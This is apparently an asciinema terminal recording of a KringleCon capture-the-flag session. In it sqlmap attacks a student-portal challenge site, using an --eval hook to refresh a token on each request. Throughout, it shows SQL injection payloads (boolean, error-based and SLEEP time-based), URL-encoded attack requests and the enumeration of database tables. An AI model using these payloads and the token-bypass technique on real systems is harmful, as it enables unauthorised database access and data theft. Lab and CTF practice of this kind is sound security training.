{"version": 2, "width": 118, "height": 34, "timestamp": 1578635398, "env": {"SHELL": "/bin/bash", "TERM": "xterm"}}
[0.009125, "o", "\u001b]0;slingshot@slingshot: ~/Desktop/Kringlecon/sqlmap-dev\u0007slingshot@slingshot:~/Desktop/Kringlecon/sqlmap-dev$ "]
[2.117373, "o", "python3 sqlmap.py -u \"https://studentportal.elfu.org/application-c\rcheck.php?elfmail=1&token=1\"  -p elfmail --dbms=MariaDB --eval=\"import requests; r = requests.get('https://studentporta\ral.elfu.org/validator.php');token = r.text;\" --tables -v 4 -D elfu"]
[3.714497, "o", "\r\n"]
[4.048362, "o", "\u001b[01;33m        ___\r\n       __H__\r\n ___ ___[\u001b[01;41m)\u001b[01;49m]_____ ___ ___  \u001b[01;37m{\u001b[01;33m1.4.1.21#dev\u001b[01;37m}\u001b[01;33m\r\n|_ -| . [\u001b[01;41m,\u001b[01;49m]     | .'| . |\r\n|___|_  [\u001b[01;41m\"\u001b[01;49m]_|_|_|__,|  _|\r\n      |_|V...       |_|   \u001b[0m\u001b[4;37mhttp://sqlmap.org\u001b[0m\r\n\r\n"]
[4.15145, "o", "[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program\r\n\r\n[*] starting @ 05:50:02 /2020-01-10/\r\n\r\n"]
[4.152061, "o", "\r[\u001b[36m05:50:02\u001b[0m] [\u001b[34mDEBUG\u001b[0m] cleaning up configuration parameters\r\n"]
[4.158578, "o", "\r[\u001b[36m05:50:02\u001b[0m] [\u001b[34mDEBUG\u001b[0m] setting the HTTP timeout\r\n"]
[4.158691, "o", "\r[\u001b[36m05:50:02\u001b[0m] [\u001b[34mDEBUG\u001b[0m] setting the HTTP User-Agent header\r\n"]
[4.158896, "o", "\r[\u001b[36m05:50:02\u001b[0m] [\u001b[34mDEBUG\u001b[0m] creating HTTP requests opener object\r\n"]
[4.159834, "o", "\r[\u001b[36m05:50:02\u001b[0m] [\u001b[34mDEBUG\u001b[0m] forcing back-end DBMS to user defined value\r\n"]
[4.305146, "o", "\r[\u001b[36m05:50:03\u001b[0m] [\u001b[34mDEBUG\u001b[0m] resolving hostname '\u001b[37mstudentportal.elfu.org\u001b[0m'\r\n"]
[4.500902, "o", "\r[\u001b[36m05:50:03\u001b[0m] [\u001b[32mINFO\u001b[0m] testing connection to the target URL\r\n"]
[4.758439, "o", "\r[\u001b[36m05:50:03\u001b[0m] [\u001b[35mTRAFFIC OUT\u001b[0m] HTTP request [\u001b[33m#1\u001b[0m]:\r\r\nGET /application-check.php?elfmail=1&token=MTAxMDMyNjY1NzkyMTU3ODYzNTQwMzEwMTAzMjY2NS43OTI=_MTI5MzIxODEyMjEzNzYzMjMzMDQ1MzA1LjM0NA== HTTP/1.1\r\r\nCache-control: no-cache\r\r\nUser-agent: sqlmap/1.4.1.21#dev (http://sqlmap.org)\r\r\nHost: studentportal.elfu.org\r\r\nAccept: */*\r\r\nAccept-encoding: gzip,deflate\r\r\nConnection: close\r\r\n\r\n"]
[4.866431, "o", "\r[\u001b[36m05:50:03\u001b[0m] [\u001b[34mDEBUG\u001b[0m] declared web page charset '\u001b[37mutf-8\u001b[0m'\r\n"]
[4.916521, "o", "sqlmap resumed the following injection point(s) from stored session:\r\n---\r\nParameter: elfmail (GET)\r\n    Type: boolean-based blind\r\n    Title: AND boolean-based blind - WHERE or HAVING clause\r\n    Payload: elfmail=1' AND 1817=1817 AND 'VsQU'='VsQU&token=1\r\n    Vector: AND [INFERENCE]\r\n\r\n    Type: error-based\r\n    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)\r\n    Payload: elfmail=1' AND (SELECT 6257 FROM(SELECT COUNT(*),CONCAT(0x7171787671,(SELECT (ELT(6257=6257,1))),0x716a6b6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'kcsP'='kcsP&token=1\r\n    Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)\r\n\r\n    Type: time-based blind\r\n    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)\r\n    Payload: elfmail=1' AND (SELECT 2136 FROM (SELECT(SLEEP(5)))DMUR) AND 'eZch'='eZch&token=1\r\n    Vector: AND (SELECT [RANDNUM] FROM "]
[4.916775, "o", "(SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])\r\n---\r\n"]
[4.917512, "o", "\r[\u001b[36m05:50:03\u001b[0m] [\u001b[32mINFO\u001b[0m] testing MySQL\r\n"]
[4.922014, "o", "\r[\u001b[36m05:50:03\u001b[0m] [\u001b[34mDEBUG\u001b[0m] resuming configuration option 'string' ('\u001b[37mYour application is still pending!\u001b[0m')\r\n"]
[4.927263, "o", "\r[\u001b[36m05:50:03\u001b[0m] [\u001b[34mDEBUG\u001b[0m] performed 0 queries in 0.00 seconds\r\n"]
[4.927491, "o", "\r[\u001b[36m05:50:03\u001b[0m] [\u001b[32mINFO\u001b[0m] confirming MySQL\r\n"]
[4.928632, "o", "\r[\u001b[36m05:50:03\u001b[0m] [\u001b[34mDEBUG\u001b[0m] performed 0 queries in 0.00 seconds\r\n"]
[4.933473, "o", "\r[\u001b[36m05:50:03\u001b[0m] [\u001b[36mPAYLOAD\u001b[0m] 1' AND (SELECT 3591 FROM(SELECT COUNT(*),CONCAT(0x7171787671,(SELECT (CASE WHEN (ISNULL(JSON_STORAGE_FREE(NULL))) THEN 1 ELSE 0 END)),0x716a6b6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'TVUn'='TVUn\r\n"]
[5.094622, "o", "\r[\u001b[36m05:50:03\u001b[0m] [\u001b[35mTRAFFIC OUT\u001b[0m] HTTP request [\u001b[33m#2\u001b[0m]:\r\r\nGET /application-check.php?elfmail=1%27%20AND%20%28SELECT%203591%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x7171787671%2C%28SELECT%20%28CASE%20WHEN%20%28ISNULL%28JSON_STORAGE_FREE%28NULL%29%29%29%20THEN%201%20ELSE%200%20END%29%29%2C0x716a6b6271%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x%29a%29%20AND%20%27TVUn%27%3D%27TVUn&token=MTAxMDMyNjY1NzkyMTU3ODYzNTQwMzEwMTAzMjY2NS43OTI=_MTI5MzIxODEyMjEzNzYzMjMzMDQ1MzA1LjM0NA== HTTP/1.1\r\r\nCache-control: no-cache\r\r\nUser-agent: sqlmap/1.4.1.21#dev (http://sqlmap.org)\r\r\nHost: studentportal.elfu.org\r\r\nAccept: */*\r\r\nAccept-encoding: gzip,deflate\r\r\nConnection: close\r\r\n\r\n"]
[5.215676, "o", "\r[\u001b[36m05:50:04\u001b[0m] [\u001b[33mWARNING\u001b[0m] reflective value(s) found and filtering out\r\n"]
[5.216754, "o", "\r[\u001b[36m05:50:04\u001b[0m] [\u001b[34mDEBUG\u001b[0m] performed 1 queries in 0.29 seconds\r\n"]
[5.217374, "o", "\r[\u001b[36m05:50:04\u001b[0m] [\u001b[34mDEBUG\u001b[0m] performed 0 queries in 0.00 seconds\r\n"]
[5.219161, "o", "\r[\u001b[36m05:50:04\u001b[0m]\u001b[1m [\u001b[32;1mINFO\u001b[0m]\u001b[1m the back-end DBMS is MySQL\u001b[0m\r\n"]
[5.21969, "o", "back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)\r\n"]
[5.220238, "o", "\r[\u001b[36m05:50:04\u001b[0m] [\u001b[32mINFO\u001b[0m] fetching tables for database: '\u001b[37melfu\u001b[0m'\r\n"]
[5.222461, "o", "\r[\u001b[36m05:50:04\u001b[0m] [\u001b[36mPAYLOAD\u001b[0m] 1' AND (SELECT 9420 FROM(SELECT COUNT(*),CONCAT(0x7171787671,(SELECT IFNULL(CAST(COUNT(table_name) AS NCHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema IN (0x656c6675)),0x716a6b6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'JyvR'='JyvR\r\n"]
[5.361974, "o", "\r[\u001b[36m05:50:04\u001b[0m] [\u001b[35mTRAFFIC OUT\u001b[0m] HTTP request [\u001b[33m#3\u001b[0m]:\r\r\nGET /application-check.php?elfmail=1%27%20AND%20%28SELECT%209420%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x7171787671%2C%28SELECT%20IFNULL%28CAST%28COUNT%28table_name%29%20AS%20NCHAR%29%2C0x20%29%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20table_schema%20IN%20%280x656c6675%29%29%2C0x716a6b6271%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x%29a%29%20AND%20%27JyvR%27%3D%27JyvR&token=MTAxMDMyNjY1ODU2MTU3ODYzNTQwNDEwMTAzMjY2NS44NTY=_MTI5MzIxODEyMjk1NjgzMjMzMDQ1MzA3LjM5Mg== HTTP/1.1\r\r\nCache-control: no-cache\r\r\nUser-agent: sqlmap/1.4.1.21#dev (http://sqlmap.org)\r\r\nHost: studentportal.elfu.org\r\r\nAccept: */*\r\r\nAccept-encoding: gzip,deflate\r\r\nConnection: close\r\r\n\r\n"]
[5.48028, "o", "\r[\u001b[36m05:50:04\u001b[0m] [\u001b[32mINFO\u001b[0m] used SQL query returns 3 entries\r\n"]
[5.481441, "o", "\r[\u001b[36m05:50:04\u001b[0m] [\u001b[36mPAYLOAD\u001b[0m] 1' AND (SELECT 6367 FROM(SELECT COUNT(*),CONCAT(0x7171787671,(SELECT MID((IFNULL(CAST(table_name AS NCHAR),0x20)),1,54) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema IN (0x656c6675) LIMIT 0,1),0x716a6b6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'POwl'='POwl\r\n"]
[5.588605, "o", "\r[\u001b[36m05:50:04\u001b[0m] [\u001b[35mTRAFFIC OUT\u001b[0m] HTTP request [\u001b[33m#4\u001b[0m]:\r\r\nGET /application-check.php?elfmail=1%27%20AND%20%28SELECT%206367%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x7171787671%2C%28SELECT%20MID%28%28IFNULL%28CAST%28table_name%20AS%20NCHAR%29%2C0x20%29%29%2C1%2C54%29%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20table_schema%20IN%20%280x656c6675%29%20LIMIT%200%2C1%29%2C0x716a6b6271%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x%29a%29%20AND%20%27POwl%27%3D%27POwl&token=MTAxMDMyNjY1ODU2MTU3ODYzNTQwNDEwMTAzMjY2NS44NTY=_MTI5MzIxODEyMjk1NjgzMjMzMDQ1MzA3LjM5Mg== HTTP/1.1\r\r\nCache-control: no-cache\r\r\nUser-agent: sqlmap/1.4.1.21#dev (http://sqlmap.org)\r\r\nHost: studentportal.elfu.org\r\r\nAccept: */*\r\r\nAccept-encoding: gzip,deflate\r\r\nConnection: close\r\r\n\r\n"]
[5.705063, "o", "[\u001b[36m05:50:04\u001b[0m] [\u001b[32mINFO\u001b[0m] retrieved: '\u001b[37mapplications\u001b[0m'\r\n"]
[5.705993, "o", "\r[\u001b[36m05:50:04\u001b[0m] [\u001b[36mPAYLOAD\u001b[0m] 1' AND (SELECT 3138 FROM(SELECT COUNT(*),CONCAT(0x7171787671,(SELECT MID((IFNULL(CAST(table_name AS NCHAR),0x20)),1,54) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema IN (0x656c6675) LIMIT 1,1),0x716a6b6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'avSr'='avSr\r\n"]
[5.837494, "o", "\r[\u001b[36m05:50:04\u001b[0m] [\u001b[35mTRAFFIC OUT\u001b[0m] HTTP request [\u001b[33m#5\u001b[0m]:\r\r\nGET /application-check.php?elfmail=1%27%20AND%20%28SELECT%203138%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x7171787671%2C%28SELECT%20MID%28%28IFNULL%28CAST%28table_name%20AS%20NCHAR%29%2C0x20%29%29%2C1%2C54%29%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20table_schema%20IN%20%280x656c6675%29%20LIMIT%201%2C1%29%2C0x716a6b6271%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x%29a%29%20AND%20%27avSr%27%3D%27avSr&token=MTAxMDMyNjY1ODU2MTU3ODYzNTQwNDEwMTAzMjY2NS44NTY=_MTI5MzIxODEyMjk1NjgzMjMzMDQ1MzA3LjM5Mg== HTTP/1.1\r\r\nCache-control: no-cache\r\r\nUser-agent: sqlmap/1.4.1.21#dev (http://sqlmap.org)\r\r\nHost: studentportal.elfu.org\r\r\nAccept: */*\r\r\nAccept-encoding: gzip,deflate\r\r\nConnection: close\r\r\n\r\n"]
[5.972461, "o", "[\u001b[36m05:50:04\u001b[0m] [\u001b[32mINFO\u001b[0m] retrieved: '\u001b[37mkrampus\u001b[0m'\r\n"]
[5.973436, "o", "\r[\u001b[36m05:50:04\u001b[0m] [\u001b[36mPAYLOAD\u001b[0m] 1' AND (SELECT 7041 FROM(SELECT COUNT(*),CONCAT(0x7171787671,(SELECT MID((IFNULL(CAST(table_name AS NCHAR),0x20)),1,54) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema IN (0x656c6675) LIMIT 2,1),0x716a6b6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'XjAs'='XjAs\r\n"]
[6.080762, "o", "\r[\u001b[36m05:50:04\u001b[0m] [\u001b[35mTRAFFIC OUT\u001b[0m] HTTP request [\u001b[33m#6\u001b[0m]:\r\r\nGET /application-check.php?elfmail=1%27%20AND%20%28SELECT%207041%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x7171787671%2C%28SELECT%20MID%28%28IFNULL%28CAST%28table_name%20AS%20NCHAR%29%2C0x20%29%29%2C1%2C54%29%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20table_schema%20IN%20%280x656c6675%29%20LIMIT%202%2C1%29%2C0x716a6b6271%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x%29a%29%20AND%20%27XjAs%27%3D%27XjAs&token=MTAxMDMyNjY1ODU2MTU3ODYzNTQwNDEwMTAzMjY2NS44NTY=_MTI5MzIxODEyMjk1NjgzMjMzMDQ1MzA3LjM5Mg== HTTP/1.1\r\r\nCache-control: no-cache\r\r\nUser-agent: sqlmap/1.4.1.21#dev (http://sqlmap.org)\r\r\nHost: studentportal.elfu.org\r\r\nAccept: */*\r\r\nAccept-encoding: gzip,deflate\r\r\nConnection: close\r\r\n\r\n"]
[6.207915, "o", "[\u001b[36m05:50:05\u001b[0m] [\u001b[32mINFO\u001b[0m] retrieved: '\u001b[37mstudents\u001b[0m'\r\n"]
[6.21768, "o", "\r[\u001b[36m05:50:05\u001b[0m] [\u001b[34mDEBUG\u001b[0m] performed 4 queries in 1.00 seconds\r\n"]
[6.218073, "o", "Database: elfu\r\n"]
[6.218102, "o", "[3 tables]\r\n"]
[6.218223, "o", "+--------------+\r\n"]
[6.218399, "o", "| applications |\r\n"]
[6.218467, "o", "| krampus      |\r\n"]
[6.218608, "o", "| students     |\r\n"]
[6.218706, "o", "+--------------+\r\n\r\n"]
[6.219159, "o", "\r[\u001b[36m05:50:05\u001b[0m] [\u001b[32mINFO\u001b[0m] fetched data logged to text files under '\u001b[37m/home/slingshot/.sqlmap/output/studentportal.elfu.org\u001b[0m'\r\n"]
[6.21928, "o", "\r\n[*] ending @ 05:50:05 /2020-01-10/\r\n\r\n"]
[6.222917, "o", "\u001b]0;slingshot@slingshot: ~/Desktop/Kringlecon/sqlmap-dev\u0007slingshot@slingshot:~/Desktop/Kringlecon/sqlmap-dev$ "]
[8.414247, "o", "e"]
[8.76501, "o", "x"]
[8.910077, "o", "i"]
[9.121986, "o", "t"]
[9.352023, "o", "\r\nexit\r\n"]
